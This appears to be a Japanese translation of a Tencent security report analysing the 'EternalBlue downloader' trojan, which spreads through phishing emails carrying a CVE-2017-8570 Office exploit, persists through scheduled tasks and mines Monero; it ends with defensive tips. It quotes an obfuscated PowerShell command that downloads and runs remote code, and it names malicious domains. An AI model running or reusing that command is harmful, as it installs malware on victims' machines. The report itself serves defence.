「EternalBlue ダウンローダー トロイの木馬」は、ユーザーのマシンを使用して Monero を採掘し、拡散するためにフィッシング メールを追加します。

「EternalBlue ダウンローダー トロイの木馬」は、ユーザーのマシンを使用して Monero を採掘し、拡散するためにフィッシング メールを追加します。

出典: テンセント ユジアン 脅威インテリジェンス センター

編集者注: 元のタイトルは「フィッシングメールを通じて「Eternal Blue Downloader Trojan」が新たに拡散、添付ファイルには CVE-2017-8570 脆弱性攻撃コードが含まれている」です。

「Eternal Blue」ダウンローダー型トロイの木馬が感染したユーザーのマシン上で実行されると、現在のユーザーの電子メール アドレス帳が自動的に開き、「urgent.doc」という添付ファイル付きの文書が送信されます。この添付ファイルには、CVE-2017-8570 脆弱性 (Sandworm II とも呼ばれる、リスクの高い Office 脆弱性) に対する攻撃コードが含まれています。

攻撃を受けたユーザーが電子メールを受信し、誤ってドキュメントを開くと、脆弱性がトリガーされ、Powershell コマンドが実行され、mail.jsp がダウンロードされる可能性があります。

 C:/Windows/System32/cmd.exe /c powershell IE`x(New-Object Net.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)

ダウンロードに使用されたドメイン名 ap35nf7.jp は実際には登録されていませんが、アドレス t.awcna.com に解決できます。これは、感染したマシンのローカル ホスト ファイルが改ざんされ、ランダムに生成されたドメイン名がトロイの木馬が使用する悪意のあるアドレスにマッピングされるためです。詳細については、Yujian Threat Intelligence Center が以前に公開したレポート「「Eternal Blue Downloader」トロイの木馬は、ホストを改ざんしてランダムなドメイン名を指定し、複数の脆弱性を利用してイントラネット マイニングを攻撃します。」を参照してください。

この攻撃中、トロイの木馬はランダムに生成された文字とサフィックス「.cn」、「.jp」、「.kr」を DGA ドメイン名として使用し、hosts ファイル内のドメイン名を指します。

 t.tr2q.com、t.awcna.com、t.amynx.com

mail.jsp は非常に難読化されています。複数回の復号化の後、実行用の Powershell スクリプトをダウンロードするための複数のスケジュールされたタスクがインストールされ、新しいスケジュールされたタスク名「Bluetea」が使用されていることがわかります。

「EternalBlue」ダウンローダー型トロイの木馬は、最初の PE サンプル攻撃から、その後の検出回避のための Powershell ファイルレス攻撃への移行、そして複数の種類のスケジュールされたタスクをインストールすることで存続するまで、登場以来更新を止めていません。拡散方法に関しては、サプライチェーン攻撃を通じて感染マシンを大量に蓄積した後、「EternalBlue」脆弱性、MSSqlブラスト、$IPCブラスト、RDPブラストなどの方法を使用してウイルスを拡散し続けました。最近では、DGA ドメイン名攻撃とフィッシング メール攻撃も追加されました。その最終的な目標は、ユーザーのマシンを使用して Monero を採掘し、利益を得ることだけです。

EternalBlue Downloader トロイの木馬の以前のバージョンは、次の表に更新されています。

安全のヒント

1. ユーザーは、不明なソースからの電子メールの添付ファイルを簡単に開かず、電子メールの添付ファイル内のファイルを実行する際には細心の注意を払うことをお勧めします。スクリプトやその他の実行可能ファイルを見つけた場合は、まずウイルス対策ソフトウェアを使用してそれらをスキャンしてください。

2. サーバーは、特に IPC$、MSSQL、および RDP アカウントのパスワードに対して安全なパスワード ポリシーを使用します。弱いパスワードによるブルートフォース攻撃を回避するために、弱いパスワードを使用しないでください。

3. Microsoft のセキュリティ発表に従って、Office の脆弱性 CVE-2017-8570 を速やかに修正します。脆弱性のスキャンと修復が必要です。または、Windows Update が使用されます。

<<:  Filecoin はどれほどの驚きをもたらすことができるでしょうか?まず、BTCとETHとの違いを見てみましょう。

>>:  2020年第1四半期のビットコインデータの傾向をレビューした記事

推薦する

この強気相場で富は誰の手に集中しているのでしょうか?

まとめ実際、市場は3月に史上最高値の73,000ドルを記録して以来、横ばい傾向にある。当社の推定によ...

SBF の判決は何をもたらすでしょうか?私たちは何を学ぶべきでしょうか?

3月28日木曜日は、21世紀で最も奇妙な物語の一つに終止符を打つ日となる。スタンフォード大学の法学...

ビットコインマイナー:ビットコインが急落、撤退すべきか、それとも留まるべきか?

今年上半期には、一部のマイナーがビットコイン採掘業界から撤退したものの、ほとんどのマイナーはこの仮想...

ブロックチェーンはすべての人を社会信用チェーンのノードにする

2008年にビットコインの概念が誕生して以来、多くの分野がその基盤技術であるブロックチェーンに注目し...

ハッカーがアルゼンチン国境検問所を麻痺させ、400万ドルのBTC身代金を要求

8月27日、ハッカー集団がランサムウェア攻撃を通じてアルゼンチンのすべての国境検問所を一時的に閉鎖し...

OKCoinグループのOK Fintechがブロックチェーンの応用を模索する新製品「Haoyouqian」を発表

OKCoinグループの子会社であるOK Fintechは最近、テクノロジーとソーシャルファイナンスを...

欧州決済評議会の調査結果によると、メンバーの90%がブロックチェーン技術が決済業界に大きな変化をもたらすと考えている。

欧州決済評議会(EPC)による最近の会員調査では、会員の90%がブロックチェーンが2025年までに決...

【ナレッジマイニングQ&A】BCHの半減期はBTCより早いですが、デススパイラルに巻き込まれるのでしょうか?

一部の読者は、BCH ブロック報酬の半減期が BTC よりも早いため、BCH が「デススパイラル」に...

ビットコインを採掘するために電力を盗んだ鎮江の「採掘機」の共犯者が逮捕された

記者は8月31日、鎮江市丹渡検察院から得た情報によると、このほど鎮江市丹渡区人民検察院は、電気を盗ん...

ビットコインは近年変化していないが、世界は変化している

元のタイトル: ビットコインの復活の理由は何ですか?出典: ニック・カーター元の翻訳: 0x88 N...

現金なしでどうやって生活するのでしょうか?

現金が消えれば、誰もが銀行に保管している電子マネーしか手に入らなくなります。これは強力な経済統制のプ...

日本取引所グループ JPX、ブロックチェーン市場インフラのテストで提携、東京取引所と大阪取引所が参加

日本取引所グループ(JPX)は、ブロックチェーン市場インフラの概念実証をテストするために、企業と取引...

【おすすめ】コードは法律?現時点では不可能です!

クレイジーな解説: この記事の著者、ルーカス・アベッグは、スイスと米国で修士号を取得した弁護士です。...